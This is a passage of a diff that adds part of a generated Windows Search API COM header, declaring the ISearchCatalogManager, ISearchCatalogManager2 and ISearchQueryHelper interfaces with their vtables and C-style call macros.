+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszUrl);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetURLIndexingState )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out DWORD *pdwState);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetPersistentItemsChangedSink )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchPersistentItemsChangedSink **ppISearchPersistentItemsChangedSink);
+        
+        HRESULT ( STDMETHODCALLTYPE *RegisterViewForNotification )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszView,
+            /* [in] */ __RPC__in_opt ISearchViewChangedSink *pViewChangedSink,
+            /* [out] */ __RPC__out DWORD *pdwCookie);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetItemsChangedSink )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [in] */ __RPC__in_opt ISearchNotifyInlineSite *pISearchNotifyInlineSite,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppv,
+            /* [out] */ __RPC__out GUID *pGUIDCatalogResetSignature,
+            /* [out] */ __RPC__out GUID *pGUIDCheckPointSignature,
+            /* [out] */ __RPC__out DWORD *pdwLastCheckPointNumber);
+        
+        HRESULT ( STDMETHODCALLTYPE *UnregisterViewForNotification )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [in] */ DWORD dwCookie);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetExtensionClusion )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszExtension,
+            /* [in] */ BOOL fExclude);
+        
+        HRESULT ( STDMETHODCALLTYPE *EnumerateExcludedExtensions )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumString **ppExtensions);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetQueryHelper )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchQueryHelper **ppSearchQueryHelper);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_DiacriticSensitivity )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [in] */ BOOL fDiacriticSensitive);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DiacriticSensitivity )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__out BOOL *pfDiacriticSensitive);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCrawlScopeManager )( 
+            __RPC__in ISearchCatalogManager * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchCrawlScopeManager **ppCrawlScopeManager);
+        
+        END_INTERFACE
+    } ISearchCatalogManagerVtbl;
+
+    interface ISearchCatalogManager
+    {
+        CONST_VTBL struct ISearchCatalogManagerVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchCatalogManager_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchCatalogManager_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchCatalogManager_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchCatalogManager_get_Name(This,pszName)	\
+    ( (This)->lpVtbl -> get_Name(This,pszName) ) 
+
+#define ISearchCatalogManager_GetParameter(This,pszName,ppValue)	\
+    ( (This)->lpVtbl -> GetParameter(This,pszName,ppValue) ) 
+
+#define ISearchCatalogManager_SetParameter(This,pszName,pValue)	\
+    ( (This)->lpVtbl -> SetParameter(This,pszName,pValue) ) 
+
+#define ISearchCatalogManager_GetCatalogStatus(This,pStatus,pPausedReason)	\
+    ( (This)->lpVtbl -> GetCatalogStatus(This,pStatus,pPausedReason) ) 
+
+#define ISearchCatalogManager_Reset(This)	\
+    ( (This)->lpVtbl -> Reset(This) ) 
+
+#define ISearchCatalogManager_Reindex(This)	\
+    ( (This)->lpVtbl -> Reindex(This) ) 
+
+#define ISearchCatalogManager_ReindexMatchingURLs(This,pszPattern)	\
+    ( (This)->lpVtbl -> ReindexMatchingURLs(This,pszPattern) ) 
+
+#define ISearchCatalogManager_ReindexSearchRoot(This,pszRootURL)	\
+    ( (This)->lpVtbl -> ReindexSearchRoot(This,pszRootURL) ) 
+
+#define ISearchCatalogManager_put_ConnectTimeout(This,dwConnectTimeout)	\
+    ( (This)->lpVtbl -> put_ConnectTimeout(This,dwConnectTimeout) ) 
+
+#define ISearchCatalogManager_get_ConnectTimeout(This,pdwConnectTimeout)	\
+    ( (This)->lpVtbl -> get_ConnectTimeout(This,pdwConnectTimeout) ) 
+
+#define ISearchCatalogManager_put_DataTimeout(This,dwDataTimeout)	\
+    ( (This)->lpVtbl -> put_DataTimeout(This,dwDataTimeout) ) 
+
+#define ISearchCatalogManager_get_DataTimeout(This,pdwDataTimeout)	\
+    ( (This)->lpVtbl -> get_DataTimeout(This,pdwDataTimeout) ) 
+
+#define ISearchCatalogManager_NumberOfItems(This,plCount)	\
+    ( (This)->lpVtbl -> NumberOfItems(This,plCount) ) 
+
+#define ISearchCatalogManager_NumberOfItemsToIndex(This,plIncrementalCount,plNotificationQueue,plHighPriorityQueue)	\
+    ( (This)->lpVtbl -> NumberOfItemsToIndex(This,plIncrementalCount,plNotificationQueue,plHighPriorityQueue) ) 
+
+#define ISearchCatalogManager_URLBeingIndexed(This,pszUrl)	\
+    ( (This)->lpVtbl -> URLBeingIndexed(This,pszUrl) ) 
+
+#define ISearchCatalogManager_GetURLIndexingState(This,pszURL,pdwState)	\
+    ( (This)->lpVtbl -> GetURLIndexingState(This,pszURL,pdwState) ) 
+
+#define ISearchCatalogManager_GetPersistentItemsChangedSink(This,ppISearchPersistentItemsChangedSink)	\
+    ( (This)->lpVtbl -> GetPersistentItemsChangedSink(This,ppISearchPersistentItemsChangedSink) ) 
+
+#define ISearchCatalogManager_RegisterViewForNotification(This,pszView,pViewChangedSink,pdwCookie)	\
+    ( (This)->lpVtbl -> RegisterViewForNotification(This,pszView,pViewChangedSink,pdwCookie) ) 
+
+#define ISearchCatalogManager_GetItemsChangedSink(This,pISearchNotifyInlineSite,riid,ppv,pGUIDCatalogResetSignature,pGUIDCheckPointSignature,pdwLastCheckPointNumber)	\
+    ( (This)->lpVtbl -> GetItemsChangedSink(This,pISearchNotifyInlineSite,riid,ppv,pGUIDCatalogResetSignature,pGUIDCheckPointSignature,pdwLastCheckPointNumber) ) 
+
+#define ISearchCatalogManager_UnregisterViewForNotification(This,dwCookie)	\
+    ( (This)->lpVtbl -> UnregisterViewForNotification(This,dwCookie) ) 
+
+#define ISearchCatalogManager_SetExtensionClusion(This,pszExtension,fExclude)	\
+    ( (This)->lpVtbl -> SetExtensionClusion(This,pszExtension,fExclude) ) 
+
+#define ISearchCatalogManager_EnumerateExcludedExtensions(This,ppExtensions)	\
+    ( (This)->lpVtbl -> EnumerateExcludedExtensions(This,ppExtensions) ) 
+
+#define ISearchCatalogManager_GetQueryHelper(This,ppSearchQueryHelper)	\
+    ( (This)->lpVtbl -> GetQueryHelper(This,ppSearchQueryHelper) ) 
+
+#define ISearchCatalogManager_put_DiacriticSensitivity(This,fDiacriticSensitive)	\
+    ( (This)->lpVtbl -> put_DiacriticSensitivity(This,fDiacriticSensitive) ) 
+
+#define ISearchCatalogManager_get_DiacriticSensitivity(This,pfDiacriticSensitive)	\
+    ( (This)->lpVtbl -> get_DiacriticSensitivity(This,pfDiacriticSensitive) ) 
+
+#define ISearchCatalogManager_GetCrawlScopeManager(This,ppCrawlScopeManager)	\
+    ( (This)->lpVtbl -> GetCrawlScopeManager(This,ppCrawlScopeManager) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchCatalogManager_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0020 */
+/* [local] */ 
+
+/* [v1_enum] */ 
+enum tagPRIORITIZE_FLAGS
+    {
+        PRIORITIZE_FLAG_RETRYFAILEDITEMS	= 0x1,
+        PRIORITIZE_FLAG_IGNOREFAILURECOUNT	= 0x2
+    } ;
+typedef int PRIORITIZE_FLAGS;
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0020_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0020_v0_0_s_ifspec;
+
+#ifndef __ISearchCatalogManager2_INTERFACE_DEFINED__
+#define __ISearchCatalogManager2_INTERFACE_DEFINED__
+
+/* interface ISearchCatalogManager2 */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchCatalogManager2;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("7AC3286D-4D1D-4817-84FC-C1C85E3AF0D9")
+    ISearchCatalogManager2 : public ISearchCatalogManager
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE PrioritizeMatchingURLs( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPattern,
+            /* [in] */ PRIORITIZE_FLAGS dwPrioritizeFlags) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchCatalogManager2Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchCatalogManager2 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchCatalogManager2 * This);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszName);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetParameter )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [retval][out] */ __RPC__deref_out_opt PROPVARIANT **ppValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetParameter )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszName,
+            /* [in] */ __RPC__in PROPVARIANT *pValue);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCatalogStatus )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [out] */ __RPC__out CatalogStatus *pStatus,
+            /* [out] */ __RPC__out CatalogPausedReason *pPausedReason);
+        
+        HRESULT ( STDMETHODCALLTYPE *Reset )( 
+            __RPC__in ISearchCatalogManager2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Reindex )( 
+            __RPC__in ISearchCatalogManager2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *ReindexMatchingURLs )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPattern);
+        
+        HRESULT ( STDMETHODCALLTYPE *ReindexSearchRoot )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszRootURL);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ConnectTimeout )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [in] */ DWORD dwConnectTimeout);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ConnectTimeout )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwConnectTimeout);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_DataTimeout )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [in] */ DWORD dwDataTimeout);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DataTimeout )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__out DWORD *pdwDataTimeout);
+        
+        HRESULT ( STDMETHODCALLTYPE *NumberOfItems )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__out LONG *plCount);
+        
+        HRESULT ( STDMETHODCALLTYPE *NumberOfItemsToIndex )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [out] */ __RPC__out LONG *plIncrementalCount,
+            /* [out] */ __RPC__out LONG *plNotificationQueue,
+            /* [out] */ __RPC__out LONG *plHighPriorityQueue);
+        
+        HRESULT ( STDMETHODCALLTYPE *URLBeingIndexed )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszUrl);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetURLIndexingState )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszURL,
+            /* [retval][out] */ __RPC__out DWORD *pdwState);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetPersistentItemsChangedSink )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchPersistentItemsChangedSink **ppISearchPersistentItemsChangedSink);
+        
+        HRESULT ( STDMETHODCALLTYPE *RegisterViewForNotification )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszView,
+            /* [in] */ __RPC__in_opt ISearchViewChangedSink *pViewChangedSink,
+            /* [out] */ __RPC__out DWORD *pdwCookie);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetItemsChangedSink )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [in] */ __RPC__in_opt ISearchNotifyInlineSite *pISearchNotifyInlineSite,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][out] */ __RPC__deref_out_opt void **ppv,
+            /* [out] */ __RPC__out GUID *pGUIDCatalogResetSignature,
+            /* [out] */ __RPC__out GUID *pGUIDCheckPointSignature,
+            /* [out] */ __RPC__out DWORD *pdwLastCheckPointNumber);
+        
+        HRESULT ( STDMETHODCALLTYPE *UnregisterViewForNotification )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [in] */ DWORD dwCookie);
+        
+        HRESULT ( STDMETHODCALLTYPE *SetExtensionClusion )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszExtension,
+            /* [in] */ BOOL fExclude);
+        
+        HRESULT ( STDMETHODCALLTYPE *EnumerateExcludedExtensions )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEnumString **ppExtensions);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetQueryHelper )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchQueryHelper **ppSearchQueryHelper);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_DiacriticSensitivity )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [in] */ BOOL fDiacriticSensitive);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_DiacriticSensitivity )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__out BOOL *pfDiacriticSensitive);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCrawlScopeManager )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [retval][out] */ __RPC__deref_out_opt ISearchCrawlScopeManager **ppCrawlScopeManager);
+        
+        HRESULT ( STDMETHODCALLTYPE *PrioritizeMatchingURLs )( 
+            __RPC__in ISearchCatalogManager2 * This,
+            /* [string][in] */ __RPC__in_string LPCWSTR pszPattern,
+            /* [in] */ PRIORITIZE_FLAGS dwPrioritizeFlags);
+        
+        END_INTERFACE
+    } ISearchCatalogManager2Vtbl;
+
+    interface ISearchCatalogManager2
+    {
+        CONST_VTBL struct ISearchCatalogManager2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchCatalogManager2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchCatalogManager2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchCatalogManager2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define ISearchCatalogManager2_get_Name(This,pszName)	\
+    ( (This)->lpVtbl -> get_Name(This,pszName) ) 
+
+#define ISearchCatalogManager2_GetParameter(This,pszName,ppValue)	\
+    ( (This)->lpVtbl -> GetParameter(This,pszName,ppValue) ) 
+
+#define ISearchCatalogManager2_SetParameter(This,pszName,pValue)	\
+    ( (This)->lpVtbl -> SetParameter(This,pszName,pValue) ) 
+
+#define ISearchCatalogManager2_GetCatalogStatus(This,pStatus,pPausedReason)	\
+    ( (This)->lpVtbl -> GetCatalogStatus(This,pStatus,pPausedReason) ) 
+
+#define ISearchCatalogManager2_Reset(This)	\
+    ( (This)->lpVtbl -> Reset(This) ) 
+
+#define ISearchCatalogManager2_Reindex(This)	\
+    ( (This)->lpVtbl -> Reindex(This) ) 
+
+#define ISearchCatalogManager2_ReindexMatchingURLs(This,pszPattern)	\
+    ( (This)->lpVtbl -> ReindexMatchingURLs(This,pszPattern) ) 
+
+#define ISearchCatalogManager2_ReindexSearchRoot(This,pszRootURL)	\
+    ( (This)->lpVtbl -> ReindexSearchRoot(This,pszRootURL) ) 
+
+#define ISearchCatalogManager2_put_ConnectTimeout(This,dwConnectTimeout)	\
+    ( (This)->lpVtbl -> put_ConnectTimeout(This,dwConnectTimeout) ) 
+
+#define ISearchCatalogManager2_get_ConnectTimeout(This,pdwConnectTimeout)	\
+    ( (This)->lpVtbl -> get_ConnectTimeout(This,pdwConnectTimeout) ) 
+
+#define ISearchCatalogManager2_put_DataTimeout(This,dwDataTimeout)	\
+    ( (This)->lpVtbl -> put_DataTimeout(This,dwDataTimeout) ) 
+
+#define ISearchCatalogManager2_get_DataTimeout(This,pdwDataTimeout)	\
+    ( (This)->lpVtbl -> get_DataTimeout(This,pdwDataTimeout) ) 
+
+#define ISearchCatalogManager2_NumberOfItems(This,plCount)	\
+    ( (This)->lpVtbl -> NumberOfItems(This,plCount) ) 
+
+#define ISearchCatalogManager2_NumberOfItemsToIndex(This,plIncrementalCount,plNotificationQueue,plHighPriorityQueue)	\
+    ( (This)->lpVtbl -> NumberOfItemsToIndex(This,plIncrementalCount,plNotificationQueue,plHighPriorityQueue) ) 
+
+#define ISearchCatalogManager2_URLBeingIndexed(This,pszUrl)	\
+    ( (This)->lpVtbl -> URLBeingIndexed(This,pszUrl) ) 
+
+#define ISearchCatalogManager2_GetURLIndexingState(This,pszURL,pdwState)	\
+    ( (This)->lpVtbl -> GetURLIndexingState(This,pszURL,pdwState) ) 
+
+#define ISearchCatalogManager2_GetPersistentItemsChangedSink(This,ppISearchPersistentItemsChangedSink)	\
+    ( (This)->lpVtbl -> GetPersistentItemsChangedSink(This,ppISearchPersistentItemsChangedSink) ) 
+
+#define ISearchCatalogManager2_RegisterViewForNotification(This,pszView,pViewChangedSink,pdwCookie)	\
+    ( (This)->lpVtbl -> RegisterViewForNotification(This,pszView,pViewChangedSink,pdwCookie) ) 
+
+#define ISearchCatalogManager2_GetItemsChangedSink(This,pISearchNotifyInlineSite,riid,ppv,pGUIDCatalogResetSignature,pGUIDCheckPointSignature,pdwLastCheckPointNumber)	\
+    ( (This)->lpVtbl -> GetItemsChangedSink(This,pISearchNotifyInlineSite,riid,ppv,pGUIDCatalogResetSignature,pGUIDCheckPointSignature,pdwLastCheckPointNumber) ) 
+
+#define ISearchCatalogManager2_UnregisterViewForNotification(This,dwCookie)	\
+    ( (This)->lpVtbl -> UnregisterViewForNotification(This,dwCookie) ) 
+
+#define ISearchCatalogManager2_SetExtensionClusion(This,pszExtension,fExclude)	\
+    ( (This)->lpVtbl -> SetExtensionClusion(This,pszExtension,fExclude) ) 
+
+#define ISearchCatalogManager2_EnumerateExcludedExtensions(This,ppExtensions)	\
+    ( (This)->lpVtbl -> EnumerateExcludedExtensions(This,ppExtensions) ) 
+
+#define ISearchCatalogManager2_GetQueryHelper(This,ppSearchQueryHelper)	\
+    ( (This)->lpVtbl -> GetQueryHelper(This,ppSearchQueryHelper) ) 
+
+#define ISearchCatalogManager2_put_DiacriticSensitivity(This,fDiacriticSensitive)	\
+    ( (This)->lpVtbl -> put_DiacriticSensitivity(This,fDiacriticSensitive) ) 
+
+#define ISearchCatalogManager2_get_DiacriticSensitivity(This,pfDiacriticSensitive)	\
+    ( (This)->lpVtbl -> get_DiacriticSensitivity(This,pfDiacriticSensitive) ) 
+
+#define ISearchCatalogManager2_GetCrawlScopeManager(This,ppCrawlScopeManager)	\
+    ( (This)->lpVtbl -> GetCrawlScopeManager(This,ppCrawlScopeManager) ) 
+
+
+#define ISearchCatalogManager2_PrioritizeMatchingURLs(This,pszPattern,dwPrioritizeFlags)	\
+    ( (This)->lpVtbl -> PrioritizeMatchingURLs(This,pszPattern,dwPrioritizeFlags) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __ISearchCatalogManager2_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0021 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0021_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0021_v0_0_s_ifspec;
+
+#ifndef __ISearchQueryHelper_INTERFACE_DEFINED__
+#define __ISearchQueryHelper_INTERFACE_DEFINED__
+
+/* interface ISearchQueryHelper */
+/* [unique][uuid][object] */ 
+
+typedef 
+enum _SEARCH_TERM_EXPANSION
+    {
+        SEARCH_TERM_NO_EXPANSION	= 0,
+        SEARCH_TERM_PREFIX_ALL	= ( SEARCH_TERM_NO_EXPANSION + 1 ) ,
+        SEARCH_TERM_STEM_ALL	= ( SEARCH_TERM_PREFIX_ALL + 1 ) 
+    } 	SEARCH_TERM_EXPANSION;
+
+typedef 
+enum _SEARCH_QUERY_SYNTAX
+    {
+        SEARCH_NO_QUERY_SYNTAX	= 0,
+        SEARCH_ADVANCED_QUERY_SYNTAX	= ( SEARCH_NO_QUERY_SYNTAX + 1 ) ,
+        SEARCH_NATURAL_QUERY_SYNTAX	= ( SEARCH_ADVANCED_QUERY_SYNTAX + 1 ) 
+    } 	SEARCH_QUERY_SYNTAX;
+
+typedef struct _SEARCH_COLUMN_PROPERTIES
+    {
+    PROPVARIANT Value;
+    LCID lcid;
+    } 	SEARCH_COLUMN_PROPERTIES;
+
+
+EXTERN_C const IID IID_ISearchQueryHelper;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("AB310581-AC80-11D1-8DF3-00C04FB6EF63")
+    ISearchQueryHelper : public IUnknown
+    {
+    public:
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ConnectionString( 
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszConnectionString) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QueryContentLocale( 
+            /* [in] */ LCID lcid) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QueryContentLocale( 
+            /* [retval][out] */ __RPC__out LCID *plcid) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QueryKeywordLocale( 
+            /* [in] */ LCID lcid) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QueryKeywordLocale( 
+            /* [retval][out] */ __RPC__out LCID *plcid) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QueryTermExpansion( 
+            /* [in] */ SEARCH_TERM_EXPANSION expandTerms) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QueryTermExpansion( 
+            /* [retval][out] */ __RPC__out SEARCH_TERM_EXPANSION *pExpandTerms) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QuerySyntax( 
+            /* [in] */ SEARCH_QUERY_SYNTAX querySyntax) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QuerySyntax( 
+            /* [retval][out] */ __RPC__out SEARCH_QUERY_SYNTAX *pQuerySyntax) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QueryContentProperties( 
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszContentProperties) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QueryContentProperties( 
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszContentProperties) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QuerySelectColumns( 
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszSelectColumns) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QuerySelectColumns( 
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszSelectColumns) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QueryWhereRestrictions( 
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszRestrictions) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QueryWhereRestrictions( 
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszRestrictions) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QuerySorting( 
+            /* [unique][string][in] */ __RPC__in_opt_string LPCWSTR pszSorting) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QuerySorting( 
+            /* [retval][string][out] */ __RPC__deref_out_opt_string LPWSTR *ppszSorting) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GenerateSQLFromUserQuery( 
+            /* [string][in] */ __RPC__in_string LPCWSTR pszQuery,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *ppszSQL) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE WriteProperties( 
+            /* [in] */ ITEMID itemID,
+            /* [in] */ DWORD dwNumberOfColumns,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfColumns) PROPERTYKEY *pColumns,
+            /* [size_is][in] */ __RPC__in_ecount_full(dwNumberOfColumns) SEARCH_COLUMN_PROPERTIES *pValues,
+            /* [unique][in] */ __RPC__in_opt FILETIME *pftGatherModifiedTime) = 0;
+        
+        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_QueryMaxResults( 
+            /* [in] */ LONG cMaxResults) = 0;
+        
+        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_QueryMaxResults( 
+            /* [retval][out] */ __RPC__out LONG *pcMaxResults) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchQueryHelperVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in ISearchQueryHelper * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in ISearchQueryHelper * This);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ConnectionString )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [string][retval][out] */ __RPC__deref_out_opt_string LPWSTR *pszConnectionString);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QueryContentLocale )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ LCID lcid);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QueryContentLocale )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][out] */ __RPC__out LCID *plcid);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QueryKeywordLocale )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ LCID lcid);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QueryKeywordLocale )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][out] */ __RPC__out LCID *plcid);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QueryTermExpansion )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ SEARCH_TERM_EXPANSION expandTerms);
+        
+        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_QueryTermExpansion )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [retval][out] */ __RPC__out SEARCH_TERM_EXPANSION *pExpandTerms);
+        
+        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_QuerySyntax )( 
+            __RPC__in ISearchQueryHelper * This,
+            /* [in] */ SEARCH_QUERY_SYNTAX querySyntax);
+        
